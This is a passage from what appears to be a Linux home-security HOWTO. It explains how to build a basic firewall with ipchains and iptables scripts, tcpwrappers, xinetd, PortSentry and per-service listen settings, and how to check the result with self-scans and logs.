LOCAL_PORTS=`cat /proc/sys/net/ipv4/ip_local_port_range |cut -f1`:\
`cat /proc/sys/net/ipv4/ip_local_port_range |cut -f2`

# Any and all addresses from anywhere.
ANYWHERE="0/0"

# Let's start clean and flush all chains to an empty state.
$IPCHAINS -F

# Set the default policies of the built-in chains. If no match for any
# of the rules below, these will be the defaults that ipchains uses.
$IPCHAINS -P forward DENY
$IPCHAINS -P output ACCEPT
$IPCHAINS -P input DENY

# Accept localhost/loopback traffic.
$IPCHAINS -A input -i lo -j ACCEPT

# Get our dynamic IP now from the Inet interface. WAN_IP will be our
# IP address we are protecting from the outside world. Put this
# here, so default policy gets set, even if interface is not up
# yet.
WAN_IP=`ifconfig $WAN_IFACE |grep inet |cut -d : -f 2 |cut -d \  -f 1`

# Bail out with error message if no IP available! Default policy is
# already set, so all is not lost here.
[ -z "$WAN_IP" ] && echo "$WAN_IFACE not configured, aborting." && exit 1

# Accept non-SYN TCP, and UDP connections to LOCAL_PORTS. These are
# the high, unprivileged ports (1024 to 4999 by default). This will
# allow return connection traffic for connections that we initiate
# to outside sources. TCP connections are opened with 'SYN' packets.
$IPCHAINS -A input -p tcp -s $ANYWHERE -d $WAN_IP $LOCAL_PORTS ! -y -j ACCEPT

# We can't be so selective with UDP since that protocol does not
# know about SYNs.
$IPCHAINS -A input -p udp -s $ANYWHERE -d $WAN_IP $LOCAL_PORTS -j ACCEPT

## ICMP (ping)
#
# ICMP rules, allow the bare essential types of ICMP only. Ping
# request is blocked, ie we won't respond to someone else's pings,
# but can still ping out.
$IPCHAINS -A input  -p icmp  --icmp-type echo-reply \
   -s $ANYWHERE -i $WAN_IFACE -j ACCEPT
$IPCHAINS -A input  -p icmp  --icmp-type destination-unreachable \
   -s $ANYWHERE -i $WAN_IFACE -j ACCEPT
$IPCHAINS -A input  -p icmp  --icmp-type time-exceeded \
   -s $ANYWHERE -i $WAN_IFACE -j ACCEPT

###################################################################
# Set the catchall, default rule to DENY, and log it all. All other
# traffic not allowed by the rules above, winds up here, where it is
# blocked and logged. This is the default policy for this chain
# anyway, so we are just adding the logging ability here with '-l'.
# Outgoing traffic is allowed as the default policy for the 'output'
# chain. There are no restrictions on that.

$IPCHAINS -A input -l -j DENY

echo "Ipchains firewall is up `date`."

##-- eof ipchains.sh


To use the above script would require that it is executable (i.e. chmod +x
ipchains.sh), and run by root to build the chains, and hence the firewall.

To summarize what this example did was to start by setting some shell
variables in the top section, to be used later in the script. Then we set the
default rules (ipchains calls these "policies") of denying all inbound and
forwarded traffic, and of allowing all our own outbound traffic. We had to
open some holes in the high, unprivileged ports so that we could have return
traffic from connections that bigcat initiates to outside addresses. If we
connect to someone's web server, we want that HTML data to be able to get
back to us, for instance. The same applies to other network traffic. We then
allowed a few specific types of the ICMP protocol (most are still blocked).
We are also logging any inbound traffic that violates any of our rules so we
know who is doing what. Notice that we are only using IP address here, not
hostnames of any kind. This is so that our firewall works, even in situation
where there may be DNS failures. Also, to prevent any kind of DNS spoofing.

See the ipchains man page for a full explanation of syntax. The important
ones we used here are:


    <20>-A input: Adds a rule to the "input" chain. The default chains are
    input, output, and forward.

    <20>-p udp: This rule only applies to the "UDP" "protocol". The -p option
    can be used with tcp, udp or icmp protocols.

    <20>-i $WAN_IFACE: This rule applies to the specified interface only, and
    applies to whatever chain is referenced (input, output, or forward).

    <20>-s <IP address> [port]: This rule only applies to the source address as
    specified. It can optionally have a port (e.g. 22) immediately afterward,
    or port range, e.g. 1023:4999.

    <20>-d <IP address> [port]: This rule only applies to the destination
    address as specified. Also, it may include port or port range.

    <20>-l : Any packet that hits a rule with this option is logged (lower case
    "L").

    <20>-j ACCEPT: Jumps to the "ACCEPT" "target". This effectively terminates
    this chain and decides the ultimate fate for this particular packet,
    which in this example is to "ACCEPT" it. The same is true for other -j
    targets like DENY.


By and large, the order in which command line options are specified is not
significant. The chain name (e.g. input) must come first though.

Remember in Step 1 when we ran netstat, we had both X and print servers
running among other things. We don't want these exposed to the Internet, even
in a limited way. These are still happily running on bigcat, but are now safe
and sound behind our ipchains based firewall. You probably have other
services that fall in this category as well.

The above example is a simplistic all or none approach. We allow all our own
outbound traffic (not necessarily a good idea), and block all inbound
connection attempts from outside. It is only protecting one interface, and
really just the inbound side of that interface. It would more than likely
require a bit of fine tuning to make it work for you. For a more advanced set
of rules, see the Appendix. And you might want to read [http://tldp.org/HOWTO
/IPCHAINS-HOWTO.html] http://tldp.org/HOWTO/IPCHAINS-HOWTO.html.

Whenever you have made changes to your firewall, you should verify its
integrity. One step to make sure your rules seem to be doing what you
intended, is to see how ipchains has interpreted your script. You can do this
by opening your xterm very wide, and issuing the following command:

+---------------------------------------------------------------------------+
| # ipchains -L -n -v | less                                                |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

The output is grouped according to chain. You should also find a way to scan
yourself (see the Verifying section below). And then keep an eye on your logs
to make sure you are blocking what is intended.
-----------------------------------------------------------------------------

5.2.2. iptables

iptables is the next generation packet filter for Linux, and requires a 2.4
kernel. It can do everything ipchains can, but has a number of noteworthy
enhancements. The syntax is similar to ipchains in many respects. See the man
page for details.

The most noteworthy enhancement is "connection tracking", also known as
"stateful inspection". This gives iptables more knowledge of the state of
each packet. Not only does it know if the packet is a TCP or UDP packet, or
whether it has the SYN or ACK flags set, but also if it is part of an
existing connection, or related somehow to an existing connection. The
implications for firewalling should be obvious.

The bottom line is that it is easier to get a tight firewall with iptables,
than with ipchains. So this is the recommended way to go.

Here is the same script as above, revised for iptables:

#!/bin/sh
#
# iptables.sh
#
# An example of a simple iptables configuration.
#
# This script allows ALL outbound traffic, and denies
# ALL inbound connection attempts from the Internet interface only.
#
###################################################################
# Begin variable declarations and user configuration options ######
#
IPTABLES=/sbin/iptables
# Local Interfaces
# This is the WAN interface that is our link to the outside world.
# For pppd and pppoe users.
# WAN_IFACE="ppp0"
WAN_IFACE="eth0"
#

## end user configuration options #################################
###################################################################

# Any and all addresses from anywhere.
ANYWHERE="0/0"

# This module may need to be loaded:
modprobe ip_conntrack_ftp

# Start building chains and rules #################################
#
# Let's start clean and flush all chains to an empty state.
$IPTABLES -F

# Set the default policies of the built-in chains. If no match for any
# of the rules below, these will be the defaults that IPTABLES uses.
$IPTABLES -P FORWARD DROP
$IPTABLES -P OUTPUT ACCEPT
$IPTABLES -P INPUT DROP

# Accept localhost/loopback traffic.
$IPTABLES -A INPUT -i lo -j ACCEPT

## ICMP (ping)
#
# ICMP rules, allow the bare essential types of ICMP only. Ping
# request is blocked, ie we won't respond to someone else's pings,
# but can still ping out.
$IPTABLES -A INPUT  -p icmp  --icmp-type echo-reply \
   -s $ANYWHERE -i $WAN_IFACE -j ACCEPT
$IPTABLES -A INPUT  -p icmp  --icmp-type destination-unreachable \
   -s $ANYWHERE -i $WAN_IFACE -j ACCEPT
$IPTABLES -A INPUT  -p icmp  --icmp-type time-exceeded \
   -s $ANYWHERE -i $WAN_IFACE -j ACCEPT

###################################################################
# Set the catchall, default rule to DENY, and log it all. All other
# traffic not allowed by the rules above, winds up here, where it is
# blocked and logged. This is the default policy for this chain
# anyway, so we are just adding the logging ability here with '-j
# LOG'. Outgoing traffic is allowed as the default policy for the
# 'output' chain. There are no restrictions on that.

$IPTABLES -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
$IPTABLES -A INPUT -m state --state NEW -i ! $WAN_IFACE -j ACCEPT
$IPTABLES -A INPUT -j LOG -m limit --limit 30/minute --log-prefix "Dropping: "

echo "Iptables firewall is up `date`."

##-- eof iptables.sh


The same script logic is used here, and thus this does pretty much the same
exact thing as the ipchains script in the previous section. There are some
subtle differences as to syntax. Note the case difference in the chain names
for one (e.g. INPUT vs input). Logging is handled differently too. It has its
own "target" now (-j LOG), and is much more flexible.

There are some very fundamental differences as well, that might not be so
obvious. Remember this section from the ipchains script:

# Accept non-SYN TCP, and UDP connections to LOCAL_PORTS. These are the high,
# unprivileged ports (1024 to 4999 by default). This will allow return
# connection traffic for connections that we initiate to outside sources.
# TCP connections are opened with 'SYN' packets. We have already opened
# those services that need to accept SYNs for, so other SYNs are excluded here
# for everything else.
$IPCHAINS -A input -p tcp -s $ANYWHERE -d $WAN_IP $LOCAL_PORTS ! -y -j ACCEPT

# We can't be so selective with UDP since that protocol does not know
# about SYNs.
$IPCHAINS -A input -p udp -s $ANYWHERE -d $WAN_IP $LOCAL_PORTS -j ACCEPT


We jumped through hoops here with ipchains so that we could restrict
unwanted, incoming connections as much as possible. A bit of a kludge,
actually.

That section is missing from the iptables version. It is not needed as
connection tracking handles this quite nicely, and then some. This is due to
the "statefulness" of iptables. It knows more about each packet than ipchains
. For instance, it knows whether the packet is part of a "new" connection, or
an "established" connection, or a "related" connection. This is the so-called
"stateful inspection" of connection tracking.

There are many, many features of iptables that are not touched on here. For
more reading on the Netfilter project and iptables, see [http://
netfilter.samba.org] http://netfilter.samba.org. And for a more advanced set
of rules, see the Appendix.
-----------------------------------------------------------------------------

5.2.3. Red Hat Firewall Configuration Tools

Red Hat has not included firewall configuration tools until 7.1, when the GUI
utility gnome-lokkit started being bundled. gnome-lokkit does a minimalist
set of rules for ipchains only. Explicit support for iptables configuration
is not an option, despite the fact that the default kernel is 2.4.

gnome-lokkit is an option on non-upgrade installs, and can also be run as a
stand-alone app any time after installation. It will ask a few simple
questions, and dump the resulting rule-set into /etc/sysconfig/ipchains.

As mentioned, this is a fairly minimalist set of rules, and possibly a
sufficient starting point. An example /etc/sysconfig/ipchains created by
gnome-lokkit:

 # Firewall configuration written by lokkit
 # Manual customization of this file is not recommended.
 # Note: ifup-post will punch the current nameservers through the
 #       firewall; such entries will *not* be listed here.
 :input ACCEPT
 :forward ACCEPT
 :output ACCEPT
 -A input -s 0/0 -d 0/0 80 -p tcp -y -j ACCEPT
 -A input -s 0/0 -d 0/0 25 -p tcp -y -j ACCEPT
 -A input -s 0/0 -d 0/0 22 -p tcp -y -j ACCEPT
 -A input -s 0/0 -d 0/0 23 -p tcp -y -j ACCEPT
 -A input -s 0/0 -d 0/0 -i lo -j ACCEPT
 -A input -s 0/0 -d 0/0 -i eth1 -j ACCEPT
 -A input -s 127.0.0.1 53 -d 0/0 -p udp -j ACCEPT
 -A input -s 0/0 -d 0/0 -p tcp -y -j REJECT
 -A input -s 0/0 -d 0/0 -p udp -j REJECT


This is in a format that can be read by the ipchains command ipchains-restore
. Consequently, a new or modified set or rules can be generated with the
ipchains-save, and redirecting the output to this file. ipchains-restore is
indeed how the ipchains init script processes this file. So for this to work,
the ipchains service must be activated:

+---------------------------------------------------------------------------+
| # chkconfig ipchains on                                                   |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

Conversely, if you want to roll your own iptables rules instead, you should
make sure the ipchains init service is disabled. There is also an iptables
init script, that works much the same as the ipchains version. There is just
no support from gnome-lokkit at this time.
-----------------------------------------------------------------------------

5.3. Tcpwrappers (libwrap)

Tcpwrappers provides much the same desired results as ipchains and iptables
above, though works quite differently. Tcpwrappers actually intercepts the
connection attempt, then examines its configurations files, and decides
whether to accept or reject the request. Tcpwrappers controls access at the
application level, rather than the socket level like iptables and ipchains.
This can be quite effective, and is a standard component on most Linux
systems.

Tcpwrappers consists of the configuration files /etc/hosts.allow and /etc/
hosts.deny. The functionality is provided by the libwrap library.

Tcpwrappers first looks to see if access is permitted in /etc/hosts.allow,
and if so, access is granted. If not in /etc/hosts.allow, the file /etc/
hosts.deny is then checked to see if access is not allowed. If so, access is
denied. Else, access is granted. For this reason, /etc/hosts.deny should
contain only one uncommented line, and that is: ALL: ALL. Access should then
be permitted through entries in /etc/hosts.allow, where specific services are
listed, along with the specific host addresses allowed to access these
services. While hostnames can be used here, use of hostnames opens the
limited possibility for name spoofing.

Tcpwrappers is commonly used to protect services that are started via inetd
(or xinetd). But also any program that has been compiled with libwrap
support, can take advantage of it. Just don't assume that all programs have
built in libwrap support -- they do not. In fact, most probably don't. So we
will only use it in our examples here to protect services start via inetd.
And then rely on our packet filtering firewall, or other mechanism, to
protect non-(x)inetd services.

Below is a small snippet from a typical inetd.conf file:

+---------------------------------------------------------------------------+
| # Pop and imap mail services et al                                        |
| #                                                                         |
| #pop-2   stream  tcp     nowait  root    /usr/sbin/tcpd ipop2d            |
| #pop-3   stream  tcp     nowait  root    /usr/sbin/tcpd ipop3d            |
| #imap    stream  tcp     nowait  root    /usr/sbin/tcpd imapd             |
| #                                                                         |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

The second to last column is the tcpwrappers daemon -- /usr/sbin/tcpd.
Immediately after is the daemon it is protecting. In this case, POP and IMAP
mail servers. Your distro probably has already done this part for you. For
the few applications that have built-in support for tcpwrappers via the
libwrap library, specifying the daemon as above is not necessary.

We will use the same principles here: default policy is to deny everything,
then open holes to allow the minimal amount of traffic necessary.

So now with your text editor, su to root and open /etc/hosts.deny. If it does
not exist, then create it. It is just a plain text file. We want the
following line:

+---------------------------------------------------------------------------+
| ALL: ALL                                                                  |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

If it is there already, fine. If not, add it in and then save and close file.
Easy enough. "ALL" is one of the keywords that tcpwrappers understands. The
format is $SERVICE_NAME : $WHO, so we are denying all connections to all
services here. At least all services that are using tcpwrappers. Remember,
this will primarily be inetd services. See man 5 hosts_access for details on
the syntax of these files. Note the "5" there!

Now let's open up just the services we need, as restrictively as we can, with
a brief example:

+---------------------------------------------------------------------------+
| ALL: 127.0.0.1                                                            |
| sshd,ipop3d: 192.168.1.                                                   |
| sshd: .myworkplace.com, hostess.mymomshouse.com                           |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

The first line allows all "localhost" connections. You will need this. The
second allows connections to the sshd and ipop3d services from IP addresses
that start with 192.168.1., in this case the private address range for our
hypothetical home LAN. Note the trailing ".". It's important. The third line
allows connections to only our sshd daemon from any host associated with
.myworkplace.com. Note the leading "." in this example. And then also, the
single host hostess.mymomshouse.com. In summary, localhost and all our LAN
connections have access to any and all tcpwrappered services on bigcat. But
only our workplace addresses, and our mother can use sshd on bigcat from
outside connections. Everybody else is denied by the default policy in /etc/
hosts.deny.

The types of wild cards above (.myworkplace.com and 192.168.1.) are not
supported by ipchains and iptables, or most other Linux applications for that
matter. Also, tcpwrappers can use hostnames in place of IP addresses which is
quite handy in some situations. This does not work with ipchains and iptables
.

You can test your tcpwrappers configuration with the included tcpdchk utility
(see the man page). Note that at this time this does not work with xinetd,
and may not even be included in this case.

There is nothing wrong with using both tcpwrappers and a packet filtering
firewall like ipchains. In fact, it is recommended to use a "layered"
approach. This helps guard against accidental misconfigurations. In this
case, each connection will be tested by the packet filter rules first, then
tcpwrappers.

Remember to make backup copies before editing system configuration files,
restart the daemon afterward, and then check the logs for error messages.
-----------------------------------------------------------------------------

5.3.1. xinetd

As mentioned, [http://www.xinetd.org] xinetd is an enhanced inetd , and
replaces inetd as of Red Hat 7.0. It has much of the same functionality, with
some notable enhancements. One is that tcpwrappers support be is compiled in,
eliminating the need for explicit references to tcpd. Which means /etc/
hosts.allow and /etc/hosts.deny are automatically in effect.

Some of xinetd's other enhancements: specify IP address to listen on, which
is a very effective method of access control; limit the rate of incoming
connections and the total number of simultaneous connections; limit services
to specific times of day. See the xinetd and xinetd.conf man pages for more
details.

The syntax is quite different though. An example from /etc/xinetd.d/tftp:

+---------------------------------------------------------------------------+
| service tftp                                                              |
| {                                                                         |
|        socket_type     = dgram                                            |
|        bind            = 192.168.1.1                                      |
|        instances       = 2                                                |
|        protocol        = udp                                              |
|        wait            = yes                                              |
|        user            = nobody                                           |
|        only_from       = 192.168.1.0                                      |
|        server          = /usr/sbin/in.tftpd                               |
|        server_args     = /tftpboot                                        |
|        disable         = no                                               |
| }                                                                         |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

Notice the bind statement. We are only listening on, or "binding" to, the
private, LAN interface here. No outside connections can be made since the
outside port is not even opened. We are also only accepting connections from
192.168.1.0, our LAN. For xinetd's purposes, this denotes any IP address
beginning with "192.168.1". Note that the syntax is different from inetd. The
server statement in this case is the tftp daemon, in.tftpd. Again, this
assumes that libwrap/tcpwrappers support is compiled into xinetd. The user
running the daemon will be "nobody". Yes, there is a user account called
"nobody", and it is wise to run such daemons as non-root users whenever
possible. Lastly, the disable statement is xinetd's way of turning services
on or off. In this case, it is "on". This is on here only as an example. Do
NOT run tftp as a public service as it is unsafe.
-----------------------------------------------------------------------------

5.4. PortSentry

[http://www.psionic.org/products/portsentry.html] Portsentry works quite
differently than the other tools discussed so far. Portsentry does what its
name implies -- it guards ports. Portsentry is configured with the /etc/
portsentry/portsentry.conf file.

Unlike the other applications discussed above, it does this by actually
becoming the listening server on those ports. Kind of like baiting a trap.
Running netstat -taup as root while portsentry is running, will show
portsentry as the LISTENER on whatever ports portsentry is configured for. If
portsentry senses a connection attempt, it blocks it completely. And then
goes a step further and blocks the route to that host to stop all further
traffic. Alternately, ipchains or iptables can be used to block the host
completely. So it makes an excellent tool to stop port scanning of a range of
ports.

But portsentry has limited flexibility as to whether it allows a given
connection. It is pretty much all or nothing. You can define specific IP
addresses that it will ignore in /etc/portsentry/portsentry.ignore. But you
cannot allow selective access to individual ports. This is because only one
server can bind to a particular port at the same time, and in this case that
is portsentry itself. So it has limited usefulness as a stand-alone firewall.
As part of an overall firewall strategy, yes, it can be quite useful. For
most of us, it should not be our first line of defense, and we should only
use it in conjunction with other tools.

Suggestion on when portsentry might be useful:

<A0><A0>*<2A>As a second layer of defense, behind either ipchains or iptables. Packet
    filtering will catch the packets first, so that anything that gets to
    portsentry would indicate a misconfiguration. Do not use in conjunction
    with inetd services -- it won't work. They will butt heads.

<A0><A0>*<2A>As a way to catch full range ports scans. Open a pinhole or two in the
    packet filter, and let portsentry catch these and re-act accordingly.

<A0><A0>*<2A>If you are very sure you have no exposed public servers at all, and you
    just want to know who is up to what. But do not assume anything about
    what portsentry is protecting. By default it does not watch all ports,
    and may even leave some very commonly probed ports open. So make sure you
    configure it accordingly. And make sure you have tested and verified your
    set up first, and that nothing is exposed.


All in all, the packet filters make for a better firewall.
-----------------------------------------------------------------------------

5.5. Proxies

The dictionary defines "proxy" as "the authority or power to act on behalf of
another". This pretty well describes software proxies as well. It is an
intermediary in the connection path. As an example, if we were using a web
proxy like "squid" ([http://www.squid-cache.org/] http://www.squid-cache.org
/), every time we browse to a web site, we would actually be connecting to
our locally running squid server. Squid in turn, would relay our request to
the ultimate, real destination. And then squid would relay the web pages back
to us. It is a go-between. Like "firewalls", a "proxy" can refer to either a
specific application, or a dedicated server which runs a proxy application.

Proxies can perform various duties, not all of which have much to do with
security. But the fact that they are an intermediary, makes them a good place
to enforce access control policies, limit direct connections through a
firewall, and control how the network behind the proxy looks to the Internet.
So this makes them strong candidates to be part of an overall firewall
strategy. And, in fact, are sometimes used instead of packet filtering
firewalls. Proxy based firewalls probably make more sense where many users
are behind the same firewall. And it probably is not high on the list of
components necessary for home based systems.

Configuring and administering proxies can be complex, and is beyond the scope
of this document. The Firewall and Proxy Server HOWTO, [http://tldp.org/HOWTO
/Firewall-HOWTO.html ] http://tldp.org/HOWTO/Firewall-HOWTO.html, has
examples of setting up proxy firewalls. Squid usage is discussed at [http://
squid-docs.sourceforge.net/latest/html/book1.htm] http://
squid-docs.sourceforge.net/latest/html/book1.htm
-----------------------------------------------------------------------------

5.6. Individual Applications

Some servers may have their own access control features. You should check
this for each server application you run. We'll only look at a few of the
common ones in this section. Man pages, and other application specific
documentation, is your friend here. This should be done whether you have
confidence in your firewall or not. Again, layers of protection is always
best.

<A0><A0>*<2A>BIND - a very common package that provides name server functionality. The
    daemon itself is "named". This only requires full exposure to the
    Internet if you are providing DNS look ups for one or more domains to the
    rest of the world. If you are not sure what this means, you do not need,
    or want, it exposed. For the overwhelming majority of us this is the
    case. It is a very common crack target.

    But it may be installed, and can be useful in a caching only mode. This
    does not require full exposure to the Internet. Limit the interfaces on
    which it "listens" by editing /etc/named.conf (random example shown):

    +---------------------------------------------------------------+
    |                                                               |
    | options {                                                     |
    |   directory "/var/named";                                     |
    |   listen-on { 127.0.0.1; 192.168.1.1; };                      |
    |   version "N/A";                                              |
    | };                                                            |
    |                                                               |
    |                                                               |
    +---------------------------------------------------------------+

    The "listen-on" statement is what limits where named listens for DNS
    queries. In this example, only on localhost and bigcat's LAN interface.
    There is no port open for the rest of the world. It just is not there.
    Restart named after making changes.

<A0><A0>*<2A>X11 can be told not to allow TCP connections by using the -nolisten tcp
    command line option. If using startx, you can make this automatic by
    placing alias startx="startx -- -nolisten tcp" in your ~/.bashrc, or the
    system-wide file, /etc/bashrc, with your text editor. If using xdm (or
    variants such as gdm, kdm, etc), this option would be specified in /etc/
    X11/xdm/Xservers (or comparable) as :0 local /usr/bin/X11/X -nolisten
    tcp. gdm actually uses /etc/X11/gdm/gdm.conf.

    If using xdm (or comparable) to start X automatically at boot, /etc/
    inittab can be modified as: xdm -udpPort 0, to further restrict
    connections. This is typically near the bottom of /etc/inittab.

<A0><A0>*<2A>Recent versions of sendmail can be told to listen only on specified
    addresses:

    +---------------------------------------------------------------+
    | # SMTP daemon options                                         |
    | O DaemonPortOptions=Port=smtp,Addr=127.0.0.1, Name=MTA        |
    |                                                               |
    |                                                               |
    +---------------------------------------------------------------+

    The above excerpt is from /etc/sendmail.cf which can be carefully added
    with your text editor. The sendmail.mc directive is:

    +---------------------------------------------------------------------------+
    |                                                                           |
    | dnl This changes sendmail to only listen on the loopback device 127.0.0.1 |
    | dnl and not on any other network devices.                                 |
    | DAEMON_OPTIONS(`Port=smtp,Addr=127.0.0.1, Name=MTA')                      |
    |                                                                           |
    |                                                                           |
    +---------------------------------------------------------------------------+

    In case you would prefer to build a new sendmail.cf, rather than edit the
    existing one. Other mail server daemons likely have similar configuration
    options. Check your local documentation. As of Red Hat 7.1, sendmail has
    compiled in support for tcpwrappers as well.

<A0><A0>*<2A>SAMBA connections can be restricted in smb.conf:

    +---------------------------------------------------------------+
    | bind interfaces = true                                        |
    | interfaces = 192.168.1. 127.                                  |
    | hosts allow = 192.168.1. 127.                                 |
    |                                                               |
    |                                                               |
    +---------------------------------------------------------------+

    This will only open, and allow, connections from localhost (127.0.0.1),
    and the local LAN address range. Adjust the LAN address as needed.

<A0><A0>*<2A>The CUPS print daemon can be told where to listen for connections. Add to
    /etc/cups/cupsd.conf:

    +---------------------------------------------------------------+
    | Listen 192.168.1.1:631                                        |
    |                                                               |
    |                                                               |
    +---------------------------------------------------------------+

    This will only open a port at the specified address and port number.

<A0><A0>*<2A>xinetd can force daemons to listen only on a specified address with its
    "bind" configuration directive. For instance, an internal LAN interface
    address. See man xinetd.conf for this and other syntax. There are various
    other control mechanisms as well.


As always, anytime you make system changes, backup the configuration file
first, restart the appropriate daemon afterward, and then check the
appropriate logs for error messages.
-----------------------------------------------------------------------------

5.7. Verifying

The final step after getting your firewall in place, is to verify that it is
doing what you intended. You would be wise to do this anytime you make even
minor changes to your system configuration.

So how to do this? There are several things you can do.

For our packet filters like ipchains and iptables, we can list all our rules,
chains, and associated activity with iptables -nvL | less (substitute
ipchains if appropriate). Open your xterm as wide as possible to avoid
wrapping long lines.

This should give you an idea if your chains are doing what you think they
should. You may want to perform some of the on-line tasks you normally do
first: open a few web pages, send and retrieve mail, etc. This will, of
course, not give you any information on tcpwrappers or portsentry. tcpdchk
can be used to verify tcpwrappers configuration (except with xinetd).

And then, scan yourself. nmap is the scanning tool of choice and is included
with recent Red Hat releases, or from [http://www.insecure.org/nmap/
nmap_download.html] http://www.insecure.org/nmap/nmap_download.html. nmap is
very flexible, and essentially is a "port prober". In other words, it looks
for open ports, among other things. See the nmap man page for details.

If you do run nmap against yourself (e.g. nmap localhost), this should tell
you what ports are open -- and visible locally only! Which hopefully by now,
is quite different from what can be seen from the outside. So, scan yourself,
and then find a trusted friend, or site (see the Links section), to scan you
from the outside. Make sure you are not violating your ISPs Terms of Service
by port scanning. It may not be allowed, even if the intentions are
honorable. Scanning from outside is the best way to know how the rest of the
world sees you. This should tell you how well that firewall is working. See
the nmap section in the Appendix for some examples on nmap usage.

One caveat on this: some ISPs may filter some ports, and you will not know
for sure how well your firewall is working. Conversely, they make it look
like certain ports are open by using web, or other, proxies. The scanner may
see the web proxy at port 80 and mis-report it as an open port on your
system.

Another option is to find a website that offers full range testing. [http://
www.hackerwhacker.com] http://www.hackerwhacker.com is one such site. Make
sure that any such site is not just scanning a relatively few well known
ports.

Repeat this procedure with every firewall change, every system upgrade or new
install, and when any key components of your system changes.

You may also want to enable logging all the denied traffic. At least
temporarily. Once the firewall is verified to be doing what you think it
should, and if the logs are hopelessly overwhelming, you may want to disable
logging.

If relying on portsentry at all, please read the documentation. Depending on
your configuration it will either drop the route to the scanner, or implement
a ipchains/iptables rule doing the same thing. Also, since it "listens" on
the specified ports, all those ports will show as "open". A false alarm in
this case.
-----------------------------------------------------------------------------

5.8. Logging

Linux does a lot of logging. Usually to more than one file. It is not always
obvious what to make of all these entries -- good, bad or indifferent?
Firewall logs tend to generate a fair amount of each. Of course, you are
wanting to stop only the "bad", but you will undoubtedly catch some harmless
traffic as well. The 'net has a lot of background noise.

In many cases, knowing the intentions of an incoming packet are almost
impossible. Attempted intrusion? Misbehaved protocol? Mis-typed IP address?
Conclusions can be drawn based on factors such as destination port, source
port, protocol, and many other variables. But there is no substitute for
experience in interpreting firewall logs. It is a black art in many cases.

So do we really need to log? And how much should we be trying to log? Logging
is good in that it tells us that the firewall is functional. Even if we don't
understand much of it, we know it is doing "something". And if we have to, we
can dig into those logs and find whatever data might be called for.

On the other hand, logging can be bad if it is so excessive, it is difficult
to find pertinent data, or worse, fills up a partition. Or if we over re-act
and take every last entry as an all out assault. Some perspective is a great
benefit, but something that new users lack almost by definition. Again, once
your firewall is verified, and you are perplexed or overwhelmed, home desktop
users may want to disable as much logging as possible. Anyone with greater
responsibilities should log, and then find ways to extract the pertinent data
from the logs by filtering out extraneous information.

Not sure where to look for log data? The two logs to keep an eye on are /var/
log/messages and /var/log/secure. There may be other application specific
logs, depending on what you have installed, or using. FTP, for instance, logs
to /var/log/xfer on Red Hat.

Portsentry and tcpwrappers do a certain amount of logging that is not
adjustable. xinetd has logging enhancements that can be turned on. Both
ipchains and iptables, on the other hand, are very flexible as to what is
logged.

For ipchains the -l option can be added to any rule. iptables uses the -j LOG
target, and requires its own, separate rule instead. iptables goes a few
steps further and allows customized log entries, and rate limiting. See the
man page. Presumably, we are more interested in logging blocked traffic, so
we'd confine logging to only our DENY and REJECT rules.

So whether you log, and how much you log, and what you do with the logs, is
an individual decision, and probably will require some trial and error so
that it is manageable. A few auditing and analytical tools can be quite
helpful:

Some tools that will monitor your logs for you and notify you when necessary.
These likely will require some configuration, and trial and error, to make
the most out of them:

<A0><A0>*<2A>A nice log entry analyzer for ipchains and iptables from Manfred Bartz:
    [http://www.logi.cc/linux/NetfilterLogAnalyzer.php3] http://www.logi.cc/
    linux/NetfilterLogAnalyzer.php3. What does all that stuff mean anyway?

<A0><A0>*<2A>LogSentry (formerly logcheck) is available from [http://www.psionic.org/
    products/logsentry.html] http://www.psionic.org/products/logsentry.html,
    the same group that is responsible for portsentry. LogSentry is an all
    purpose log monitoring tool with a flexible configuration, that handles
    multiple logs.

<A0><A0>*<2A>[http://freshmeat.net/projects/firelogd/] http://freshmeat.net/projects/
    firelogd/, the Firewall Log Daemon from Ian Jones, is designed to watch,
    and send alerts on iptables or ipchains logs data.

<A0><A0>*<2A>[http://freshmeat.net/projects/fwlogwatch/] http://freshmeat.net/projects
    /fwlogwatch/ by Boris Wesslowski, is a similar idea, but supports more
    log formats.


-----------------------------------------------------------------------------
5.9. Where to Start

Let's take a quick look at where to run our firewall scripts from.

Portsentry can be run as an init process, like other system services. It is
not so important when this is done. Tcpwrappers will be automatically be
invoked by inetd or xinetd, so not to worry there either.

But the packet filtering scripts will have to be started somewhere. And many
scripts will have logic that uses the local IP address. This will mean that
the script must be started after the interface has come up and been assigned
an IP address. Ideally, this should be immediately after the interface is up.
So this depends on how you connect to the Internet. Also, for protocols like
PPP or DHCP that may be dynamic, and get different IP's on each re-connect,
it is best to have the scripts run by the appropriate daemon.

Red Hat uses /etc/ppp/ip-up.local for any user defined, local PPP
configuration. If this file does not exist, create it, and make it executable
(chmod +x). Then with your text editor, add a reference to your firewall
script.

For DHCP, it depends on which client. dhcpcd will execute /etc/dhcpcd/dhcpcd-
<interface>.exe (e.g. dhcpcd-eth0.exe) whenever a lease is obtained or
renewed. So this is where to put a reference to your firewall script. For
pump (the default on Red Hat), the main configuration file is /etc/pump.conf.
Pump will run whatever script is defined by the "script" statement any time
there is a new or renewed lease:

 script /usr/local/bin/ipchains.sh


If you have a static IP address (i.e. it never changes), the placement is not
so important and should be before the interface comes up!
-----------------------------------------------------------------------------

5.10. Summary and Conclusions for Step 3

In this section we looked at various components that might be used to
construct a "firewall". And learned that a firewall is as much a strategy and
combination of components, as it is any one particular application or
component. We looked at a few of the most commonly available applications
that can be found on most, if not all, Linux systems. This is not a
definitive list.

This is a lot of information to digest at all at one time and expect anyone
to understand it all. Hopefully this can used as a starting point, and used
for future reference as well. The packet filter firewall examples can be used
as starting points as well. Just use your text editor, cut and paste into a
file with an appropriate name, and then run chmod +x against it to make it
executable. Some minor editing of the variables may be necessary. Also look
at the Links section for sites and utilities that can be used to generate a
custom script. This may be a little less daunting.

Now we are done with Steps 1, 2 and 3. Hopefully by now you have already
instituted some basic measures to protect your system(s) from the various and
sundry threats that lurk on networks. If you haven't implemented any of the
above steps yet, now is a good time to take a break, go back to the top, and
have at it. The most important steps are the ones above.

A few quick conclusions...

"What is best iptables, ipchains, tcpwrappers, or portsentry?" The quick
answer is that iptables can do more than any of the others. So if you are
